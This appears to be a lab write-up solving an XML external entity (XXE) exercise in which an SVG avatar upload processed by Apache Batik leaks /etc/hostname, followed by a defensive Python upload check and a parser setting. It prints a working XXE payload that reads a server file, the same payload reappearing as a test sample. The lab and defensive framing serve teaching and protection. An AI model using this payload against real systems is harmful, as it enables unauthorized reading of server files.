Lab link.
This lab lets users attach avatars to comments and uses the Apache Batik library to process avatar image files.
To solve the lab, upload an image that displays the contents of the /etc/hostname file after processing. Then use the “Submit solution” button to submit the value of the server hostname.
First we need an attack surface. In this lab it is the comment form, which accepts an image file for the avatar and hands that file to Apache Batik, an SVG library, so the "image" is in fact XML input. We can therefore submit an SVG document in place of the image, either by uploading an SVG file directly or by editing the multipart upload request.
If we upload a PNG file, this is what the upload request looks like.
We replace the image body with the following XML: an SVG whose DOCTYPE declares an external entity pointing at /etc/hostname and references it inside a text element.
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
  <text font-size="16" x="0" y="16">&xxe;</text>
</svg>
After the upload, the contents of /etc/hostname appear in the rendered avatar image next to the comment: the XML parser expanded the external entity into the text element before Batik rasterised the SVG, so the file contents became part of the picture.
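The root cause here is that an upload labelled as an image is parsed as XML with DTD processing enabled. The following is an added example (not code from the lab or from Apache Batik) showing the kind of pre-parse check an upload handler can apply before any XML parser sees the bytes: verify the PNG magic for raster uploads, and refuse SVG uploads that carry a DOCTYPE or ENTITY declaration at all, since an avatar never needs one. The function name classify_avatar and the sample inputs are constructed for this example; the XXE sample reproduces the SVG shown above.

```python
import re

# Every valid PNG file starts with this eight-byte signature.
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"

# A DTD or entity declaration is what lets an SVG pull file:///etc/hostname
# into the document via an external entity; an avatar has no use for either.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)
ENTITY_RE = re.compile(rb"<!ENTITY\b", re.IGNORECASE)


def classify_avatar(data: bytes) -> str:
    """Classify an uploaded avatar as 'png', 'svg' or 'reject'.

    Hypothetical helper for this example. It is a defence-in-depth layer that
    runs before parsing; the primary control remains an XML parser configured
    to disallow DTDs and external entities.
    """
    if data.startswith(PNG_MAGIC):
        return "png"

    # Drop a UTF-8 BOM and leading whitespace, then inspect the XML prolog.
    head = data[3:] if data.startswith(b"\xef\xbb\xbf") else data
    head = head.lstrip()
    if not (head.startswith(b"<?xml") or head.startswith(b"<svg")):
        return "reject"  # neither a PNG nor anything that looks like SVG

    # The byte-level regexes only see plain UTF-8; refuse anything else so a
    # declaration in another encoding cannot slip past the check.
    try:
        head.decode("utf-8")
    except UnicodeDecodeError:
        return "reject"

    if DOCTYPE_RE.search(head) or ENTITY_RE.search(head):
        return "reject"  # any DTD in an avatar is a red flag
    return "svg"


# Constructed sample uploads for demonstration.
SAMPLE_PNG = PNG_MAGIC + b"\x00\x00\x00\rIHDR" + b"\x00" * 13
BENIGN_SVG = (
    b'<?xml version="1.0"?>'
    b'<svg xmlns="http://www.w3.org/2000/svg" width="128" height="128">'
    b'<circle cx="64" cy="64" r="40"/></svg>'
)
XXE_SVG = (
    b'<?xml version="1.0" standalone="yes"?>'
    b'<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>'
    b'<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" version="1.1">'
    b'<text font-size="16" x="0" y="16">&xxe;</text></svg>'
)

if __name__ == "__main__":
    for name, blob in (("png", SAMPLE_PNG), ("benign svg", BENIGN_SVG), ("xxe svg", XXE_SVG)):
        print(f"{name:>10}: {classify_avatar(blob)}")
```

In a Java service such as one built on Batik, the parser-side control this check sits in front of is the JAXP feature http://apache.org/xml/features/disallow-doctype-decl set to true on the parser factory, which makes the DOCTYPE in the payload above a fatal parse error instead of an instruction to read a file.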